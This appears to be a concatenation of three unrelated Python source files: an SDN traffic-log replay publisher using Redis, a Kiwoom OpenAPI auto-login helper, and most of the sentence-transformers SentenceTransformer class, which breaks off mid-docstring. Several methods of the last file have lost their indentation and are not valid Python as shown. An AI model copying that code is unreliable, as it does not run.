        self.parse_logs(num_timesteps, flows_dir, ports_dir)
        self.info()
        pretty(self.data)
    def parse_config(self, config):
        """Build the cookie -> LogEntry and (dpid, port) -> LogEntry lookups
        from the whitespace-separated config file."""
        with open(config, 'r') as infile:
            for line in infile:
                # catch comment lines and empty lines
                if line[0] == "#" or line.isspace():
                    continue
                # build data structure which we can use to assign the logs to the correct edge and traffic type
                data = line.split()
                from_node = name_mapping[data[0]]
                to_node = name_mapping[data[1]]
                traffic_type = traffic_mapping[data[2]]
                if "PORT" in data[3]:
                    # Format: PORT_<dpid>_<port>
                    dpid = int(data[3].split("_")[1])
                    port = int(data[3].split("_")[2])
                    self.ports[(dpid, port)].append(self.log_entry(from_node, to_node, traffic_type))
                else:
                    # Format: <cookie>,<cookie>,...,<cookie>
                    cookies = [int(x) for x in data[3].split(",")]
                    for cookie in cookies:
                        self.flows[cookie].append(self.log_entry(from_node, to_node, traffic_type))
    def parse_logs(self, num_timesteps, flows_dir, ports_dir):
        """Parse <flows_dir>/NNN.flow and <ports_dir>/NNN.ports for every
        timestep (NNN is the zero-padded step number)."""
        for i in range(0, num_timesteps):
            file_name = '{num:03d}'.format(num=i)
            flow_file = flows_dir + "/" + file_name + ".flow"
            self.parse_flow_log(flow_file, i)
            port_file = ports_dir + "/" + file_name + ".ports"
            self.parse_port_log(port_file, i)
        # add missing values
        self.clean_logs()
    def parse_flow_log(self, file, step):
        """Accumulate one .flow file into self.data for *step*.

        Line format assumed: first column is the cookie, last column the byte
        count. (Parameter ``file`` shadows the builtin; kept as-is.)
        """
        with open(file, 'r') as infile:
            for line in infile:
                data = line.split()
                cookie = int(data[0])
                byte_count = int(data[-1])
                if cookie in self.flows:
                    entry_labels = self.flows[cookie]
                    for entry_label in entry_labels:
                        self.data[(entry_label.source, entry_label.destination)][entry_label.type][step] += byte_count
    def parse_port_log(self, file, step):
        """Accumulate one .ports file into self.data for *step*.

        The dpid is the digits embedded in column 1, the port is column 3
        (-1 when non-numeric), the byte count the third-last column.
        """
        with open(file, 'r') as infile:
            for line in infile:
                data = line.split()
                dpid = int(''.join(c for c in data[1] if c.isdigit()))
                port = int(data[3]) if data[3].isdigit() else -1
                byte_count = int(data[-3])
                if (dpid, port) in self.ports:
                    entry_labels = self.ports[(dpid, port)]
                    for entry_label in entry_labels:
                        self.data[(entry_label.source, entry_label.destination)][entry_label.type][step] += byte_count
    def next_values(self, step=1):
        """Return the next batch of (label, source, destination, type, value)
        tuples as driven by the module-level ``messages`` catalogue, then
        advance current_timestep by *step*.

        "difference" messages publish the delta between the next and current
        timestep, clamped at 0; "total" messages publish the raw counter.
        Missing timesteps read as 0 because the leaves are defaultdict(int).
        """
        data = list()
        self.logger.info("Current Step: "+ str(self.current_timestep))
        for message_type, settings in messages.iteritems():
            label = str(message_type)
            for message in settings["values"]:
                source = str(message[0])
                destination = str(message[1])
                traffic_types = message[2]
                for traffic_type, values in self.data[(source, destination)].iteritems():
                    # an empty filter list means "publish all traffic types"
                    if not traffic_types or traffic_type in traffic_types:
                        type = str(traffic_type)
                        if settings["type"] == "difference":
                            value = values[self.current_timestep + step] - values[self.current_timestep]
                            if value < 0:
                                self.logger.info("negative value (" + str(value) + ") for " +
                                                 source + "-" + destination + "-" + traffic_type +
                                                 " at step " + str(self.current_timestep + step))
                                value = 0
                            value = str(value)
                        elif settings["type"] == "total":
                            value = str(values[self.current_timestep + step])
                        data.append((label,
                                     source,
                                     destination,
                                     type,
                                     value))
        self.current_timestep += step
        return data
    def clean_logs(self):
        """Backfill gaps so every counter series spans the same length: a
        missing timestep inherits the previous step's value."""
        lengths = []
        for edge, data in self.data.iteritems():
            for type, values in data.iteritems():
                lengths.append(len(values))
        max_length = max(lengths)
        for edge, data in self.data.iteritems():
            for type, values in data.iteritems():
                for i in range(0, max_length):
                    if i not in values:
                        # NOTE(review): at i == 0 this reads values[-1], which the
                        # defaultdict silently creates as 0 — confirm intended.
                        values[i] = values[i - 1]
    def info(self):
        """Log a one-line summary at INFO and a full dump at DEBUG of the
        parsed data sources and graph edges."""
        # data sources
        info_message = "data sources: got " + str(len(self.flows)) + " flows and " + str(len(self.ports)) + " ports, "
        debug_message = "data sources\n"
        for key, value in self.flows.iteritems():
            debug_message += str(key) + " " + str(value) + "\n"
        for key, value in self.ports.iteritems():
            debug_message += str(key) + " " + str(value) + "\n"
        # edges in the graph
        max_length = max([len(values) for values in self.data.values()])
        info_message += "graph edges: got " + str(len(self.data)) + " edges with " + str(max_length) + " values each"
        debug_message += "\ngraph edges\n"
        for key, values in self.data.iteritems():
            debug_message += str(key) + " with " + str(len(values)) + " values\n"
        self.logger.info(info_message)
        self.logger.debug(debug_message)
class Publisher(object):
    """Thin wrapper publishing messages on a single redis pub/sub channel."""

    def __init__(self, channel, address, port):
        self.channel = channel
        self.redis_client = redis.StrictRedis(host=address, port=port)

    def publish(self, message):
        """Send *message* on the configured channel."""
        client = self.redis_client
        client.publish(self.channel, message)
def main(argv):
    """Wire up history, publisher and replay thread, then wait for Ctrl-C."""
    logging.basicConfig(level=logging.INFO)

    history = LogHistory(argv.config, argv.flow_dir, argv.port_dir, int(argv.num_steps), debug=True)

    # Redis endpoint carrying the stats channel.
    publisher = Publisher("sdx_stats", "192.168.99.100", 6379)
    log_replay = LogReplay(history, publisher, int(argv.timestep), debug=True)

    # start replay in the background; daemon so an interrupt can end the program
    replay_thread = Thread(target=log_replay.start)
    replay_thread.daemon = True
    replay_thread.start()

    while replay_thread.is_alive():
        try:
            replay_thread.join(1)
        except KeyboardInterrupt:
            log_replay.stop()
''' main '''
if __name__ == '__main__':
    # Five positional arguments, all required, all forwarded to main().
    cli = argparse.ArgumentParser()
    for arg_name, arg_help in (('config', 'path of config file'),
                               ('flow_dir', 'path of flow stats'),
                               ('port_dir', 'path of port stats'),
                               ('num_steps', 'number of steps'),
                               ('timestep', 'time step')):
        cli.add_argument(arg_name, help=arg_help)
    main(cli.parse_args())
|
autologin2.py | import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import OPENAPI_PATH
class Window(QtWidgets.QMainWindow):
    """Qt window that drives the Kiwoom OpenAPI login and switches on its
    auto-login setting."""
    # Created at class-definition time so a QApplication exists before the
    # QAxWidget below is instantiated.
    app = QtWidgets.QApplication(sys.argv)
    def __init__(self):
        super().__init__()
        # flips to True once OnEventConnect reports a successful login
        self.bool_connected = False
        # Kiwoom OpenAPI ActiveX control
        self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
        self.ocx.OnEventConnect.connect(self.OnEventConnect)
        self.CommConnect()
    def CommConnect(self):
        """Start the login and pump COM messages until the connect event fires."""
        self.ocx.dynamicCall('CommConnect()')
        while not self.bool_connected:
            # busy-wait: keep dispatching pending COM messages so the
            # OnEventConnect callback can run
            pythoncom.PumpWaitingMessages()
    def OnEventConnect(self, err_code):
        # err_code 0 is treated as a successful login
        if err_code == 0:
            self.bool_connected = True
            self.AutoLoginOn()
    def AutoLoginOn(self):
        """Open the account window and schedule auto_on() 5 seconds later to
        tick the auto-login option. (Korean prints: waiting for / completed /
        shutting down the auto-login setup process.)"""
        print('\n 자동 로그인 설정 대기 중 ...\n')
        QTimer.singleShot(5000, lambda: auto_on(2))
        self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
        print(' 자동 로그인 설정 완료\n')
        print(' 자동 로그인 설정용 프로세스 종료 중 ...')
if __name__ == '__main__':
    # Delete any stale auto-login file so the login dialog appears again.
    login_info = f'{OPENAPI_PATH}/system/Autologin.dat'
    if os.path.isfile(login_info):
        os.remove(f'{OPENAPI_PATH}/system/Autologin.dat')
        print('\n 자동 로그인 설정 파일 삭제 완료\n')
    # Run the Qt/COM login window in its own process so this script can keep
    # driving the login dialog from the outside.
    Process(target=Window).start()
    print(' 자동 로그인 설정용 프로세스 시작\n')
    # Poll until the 'Open API login' dialog exists, then type credentials.
    while find_window('Open API login') == 0:
        print(' 로그인창 열림 대기 중 ...\n')
        time.sleep(1)
    print(' 아이디 및 패스워드 입력 대기 중 ...\n')
    time.sleep(5)
    manual_login(4)
    print(' 아이디 및 패스워드 입력 완료\n')
|
SentenceTransformer.py | import json
import logging
import os
import shutil
import stat
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
:param use_auth_token: HuggingFace authentication token to download private models.
"""
def __init__(self, model_name_or_path: Optional[str] = None,
             modules: Optional[Iterable[nn.Module]] = None,
             device: Optional[str] = None,
             cache_folder: Optional[str] = None,
             use_auth_token: Union[bool, str, None] = None
             ):
    self._model_card_vars = {}
    self._model_card_text = None
    self._model_config = {}
    # Resolve the cache folder: env var first, then <torch cache>/sentence_transformers.
    if cache_folder is None:
        cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
        if cache_folder is None:
            try:
                from torch.hub import _get_torch_home
                torch_cache_home = _get_torch_home()
            except ImportError:
                torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
            cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
    if model_name_or_path is not None and model_name_or_path != "":
        logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
        #Old models that don't belong to any organization
        basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
        if os.path.exists(model_name_or_path):
            #Load from path
            model_path = model_name_or_path
        else:
            #Not a path, load from hub
            if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
                raise ValueError("Path {} not found".format(model_name_or_path))
            if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
                # A model from sentence-transformers
                model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
            model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
            # Download from hub with caching
            snapshot_download(model_name_or_path,
                              cache_dir=cache_folder,
                              library_name='sentence-transformers',
                              library_version=__version__,
                              ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'],
                              use_auth_token=use_auth_token)
        if os.path.exists(os.path.join(model_path, 'modules.json')):    #Load as SentenceTransformer model
            modules = self._load_sbert_model(model_path)
        else:   #Load with AutoModel
            modules = self._load_auto_model(model_path)
    # nn.Sequential wants an OrderedDict of named modules; index-name anything else.
    if modules is not None and not isinstance(modules, OrderedDict):
        modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
    super().__init__(modules)
    if device is None:
        device = "cuda" if torch.cuda.is_available() else "cpu"
        logger.info("Use pytorch device: {}".format(device))
    # Remembered target device; encode() moves the model here lazily.
    self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
           batch_size: int = 32,
           show_progress_bar: bool = None,
           output_value: str = 'sentence_embedding',
           convert_to_numpy: bool = True,
           convert_to_tensor: bool = False,
           device: str = None,
           normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
    """
    Computes sentence embeddings
    :param sentences: the sentences to embed
    :param batch_size: the batch size used for the computation
    :param show_progress_bar: Output a progress bar when encode sentences
    :param output_value:  Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings. Set to None, to get all output values
    :param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
    :param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
    :param device: Which torch.device to use for the computation
    :param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
    :return:
       By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
    """
    self.eval()
    if show_progress_bar is None:
        show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
    if convert_to_tensor:
        convert_to_numpy = False
    # Non-default output values cannot be stacked/converted uniformly.
    if output_value != 'sentence_embedding':
        convert_to_tensor = False
        convert_to_numpy = False
    input_was_string = False
    if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
        sentences = [sentences]
        input_was_string = True
    if device is None:
        device = self._target_device
    self.to(device)
    all_embeddings = []
    # Sort inputs by decreasing length so each batch needs minimal padding.
    length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
    sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
    for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
        sentences_batch = sentences_sorted[start_index:start_index+batch_size]
        features = self.tokenize(sentences_batch)
        features = batch_to_device(features, device)
        with torch.no_grad():
            out_features = self.forward(features)
            if output_value == 'token_embeddings':
                embeddings = []
                for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
                    # Trim trailing padding using the attention mask.
                    last_mask_id = len(attention)-1
                    while last_mask_id > 0 and attention[last_mask_id].item() == 0:
                        last_mask_id -= 1
                    embeddings.append(token_emb[0:last_mask_id+1])
            elif output_value is None:  #Return all outputs
                embeddings = []
                for sent_idx in range(len(out_features['sentence_embedding'])):
                    row = {name: out_features[name][sent_idx] for name in out_features}
                    embeddings.append(row)
            else:   #Sentence embeddings
                embeddings = out_features[output_value]
                embeddings = embeddings.detach()
                if normalize_embeddings:
                    embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
                # fixes for #522 and #487 to avoid oom problems on gpu with large datasets
                if convert_to_numpy:
                    embeddings = embeddings.cpu()
            all_embeddings.extend(embeddings)
    # Undo the length-based sort so outputs line up with the input order.
    all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
    if convert_to_tensor:
        all_embeddings = torch.stack(all_embeddings)
    elif convert_to_numpy:
        all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
    if input_was_string:
        all_embeddings = all_embeddings[0]
    return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
    """
    Starts multi process to process the encoding with several, independent processes.
    This method is recommended if you want to encode on multiple GPUs. It is advised
    to start only one process per GPU. This method works together with encode_multi_process

    :param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
    :return: Returns a dict with the target processes, an input queue and and output queue.
    """
    if target_devices is None:
        if torch.cuda.is_available():
            target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
        else:
            logger.info("CUDA is not available. Start 4 CPU worker")
            target_devices = ['cpu']*4
    logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
    # 'spawn' is required so each worker gets a clean CUDA context.
    ctx = mp.get_context('spawn')
    input_queue = ctx.Queue()
    output_queue = ctx.Queue()
    processes = []
    for cuda_id in target_devices:
        # daemon=True: workers die with the parent process
        p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
        p.start()
        processes.append(p)
    return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
    """
    This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
    and sent to individual processes, which encode these on the different GPUs. This method is only suitable
    for encoding large sets of sentences

    :param sentences: List of sentences
    :param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
    :param batch_size: Encode sentences with batch size
    :param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
    :return: Numpy matrix with all embeddings
    """
    if chunk_size is None:
        # aim for ~10 chunks per worker, capped at 5000 sentences per chunk
        chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
    logger.info("Chunk data into packages of size {}".format(chunk_size))
    input_queue = pool['input']
    last_chunk_id = 0
    chunk = []
    # Feed work items as [chunk_id, batch_size, sentences] lists.
    for sentence in sentences:
        chunk.append(sentence)
        if len(chunk) >= chunk_size:
            input_queue.put([last_chunk_id, batch_size, chunk])
            last_chunk_id += 1
            chunk = []
    # flush the trailing partial chunk
    if len(chunk) > 0:
        input_queue.put([last_chunk_id, batch_size, chunk])
        last_chunk_id += 1
    output_queue = pool['output']
    # Workers may finish out of order; sort results back by chunk id.
    results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
    embeddings = np.concatenate([result[1] for result in results_list])
    return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
    """
    Saves all elements for this seq. sentence embedder into different sub-folders
    :param path: Path on disc
    :param model_name: Optional model name
    :param create_model_card: If True, create a README.md with basic information about this model
    """
    if path is None:
        return
    os.makedirs(path, exist_ok=True)
    logger.info("Save model to {}".format(path))
    modules_config = []
    #Save some model info
    if '__version__' not in self._model_config:
        self._model_config['__version__'] = {
            'sentence_transformers': __version__,
            'transformers': transformers.__version__,
            'pytorch': torch.__version__,
        }
    with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
        json.dump(self._model_config, fOut, indent=2)
    #Save modules
    for idx, name in enumerate(self._modules):
        module = self._modules[name]
        if idx == 0 and isinstance(module, Transformer):    #Save transformer model in the main folder
            model_path = path + "/"
        else:
            # every other module goes into <idx>_<ClassName>/
            model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
        os.makedirs(model_path, exist_ok=True)
        module.save(model_path)
        modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
    # modules.json lets the loader reconstruct the pipeline in order.
    with open(os.path.join(path, 'modules.json'), 'w') as fOut:
        json.dump(modules_config, fOut, indent=2)
    # Create model card
    if create_model_card:
        self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
    """
    Create an automatic model card and store it in path/README.md.

    Reuses a previously loaded card text verbatim when available; otherwise
    fills the ModelCardTemplate placeholders from the current model.
    """
    if self._model_card_text is not None and len(self._model_card_text) > 0:
        model_card = self._model_card_text
    else:
        tags = ModelCardTemplate.__TAGS__.copy()
        model_card = ModelCardTemplate.__MODEL_CARD__
        # The plain-transformers usage section is only emitted for the
        # canonical Transformer + simple-pooling architecture.
        if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
            pooling_module = self._last_module()
            pooling_mode = pooling_module.get_pooling_mode_str()
            model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
            pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
            model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
            tags.append('transformers')
        # Print full model
        model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
        # Add tags
        model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
        # Add dim info
        self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
        # Replace vars we created while using the model
        for name, value in self._model_card_vars.items():
            model_card = model_card.replace(name, str(value))
        # Replace remaining vars with default values
        for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
            model_card = model_card.replace(name, str(value))
    if model_name is not None:
        model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
    with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
        fOut.write(model_card.strip())
def save_to_hub(self,
                repo_name: str,
                organization: Optional[str] = None,
                private: Optional[bool] = None,
                commit_message: str = "Add new SentenceTransformer model.",
                local_model_path: Optional[str] = None,
                exist_ok: bool = False,
                replace_model_card: bool = False):
    """
    Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.

    :param repo_name: Repository name for your model in the Hub.
    :param organization:  Organization in which you want to push your model or tokenizer (you must be a member of this organization).
    :param private: Set to true, for hosting a prive model
    :param commit_message: Message to commit while pushing.
    :param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
    :param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
    :param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
    :return: The url of the commit of your model in the given repository.
    :raises ValueError: when no hub token is stored locally, or when the
        organization embedded in repo_name conflicts with ``organization``.
    """
    token = HfFolder.get_token()
    if token is None:
        raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
    # Accept "org/name" form, but only if it agrees with the organization arg.
    if '/' in repo_name:
        splits = repo_name.split('/', maxsplit=1)
        if organization is None or organization == splits[0]:
            organization = splits[0]
            repo_name = splits[1]
        else:
            raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
    endpoint = "https://huggingface.co"
    repo_url = HfApi(endpoint=endpoint).create_repo(
        token,
        repo_name,
        organization=organization,
        private=private,
        repo_type=None,
        exist_ok=exist_ok,
    )
    full_model_name = repo_url[len(endpoint)+1:].strip("/")
    with tempfile.TemporaryDirectory() as tmp_dir:
        # First create the repo (and clone its content if it's nonempty).
        logger.info("Create repository and clone it if it exists")
        repo = Repository(tmp_dir, clone_from=repo_url)
        # If user provides local files, copy them.
        if local_model_path:
            copy_tree(local_model_path, tmp_dir)
        else:  # Else, save model directly into local repo.
            create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
            self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
        #Find files larger 5M and track with git-lfs
        large_files = []
        for root, dirs, files in os.walk(tmp_dir):
            for filename in files:
                file_path = os.path.join(root, filename)
                rel_path = os.path.relpath(file_path, tmp_dir)
                if os.path.getsize(file_path) > (5 * 1024 * 1024):
                    large_files.append(rel_path)
        if len(large_files) > 0:
            logger.info("Track files with git lfs: {}".format(", ".join(large_files)))
            repo.lfs_track(large_files)
        logger.info("Push model to the hub. This might take a while")
        push_return = repo.push_to_hub(commit_message=commit_message)
        def on_rm_error(func, path, exc_info):
            # path contains the path of the file that couldn't be removed
            # let's just assume that it's read-only and unlink it.
            try:
                os.chmod(path, stat.S_IWRITE)
                os.unlink(path)
            except:
                pass
        # Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
        # Hence, try to set write permissions on error
        try:
            for f in os.listdir(tmp_dir):
                shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
        except Exception as e:
            logger.warning("Error when deleting temp folder: {}".format(str(e)))
            pass
        return push_return
def smart_batching_collate(self, batch):
    """
    Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
    Here, batch is a list of tuples: [(tokens, label), ...]

    :param batch:
        a batch from a SmartBatchingDataset
    :return:
        a batch of tensors for the model
    """
    num_texts = len(batch[0].texts)
    # Transpose: one list per text "column" across all examples.
    texts = [[] for _ in range(num_texts)]
    labels = []
    for example in batch:
        for idx, text in enumerate(example.texts):
            texts[idx].append(text)
        labels.append(example.label)
    labels = torch.tensor(labels).to(self._target_device)
    sentence_features = []
    for idx in range(num_texts):
        tokenized = self.tokenize(texts[idx])
        # batch_to_device moves the tokenized tensors onto the target device
        batch_to_device(tokenized, self._target_device)
        sentence_features.append(tokenized)
    return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
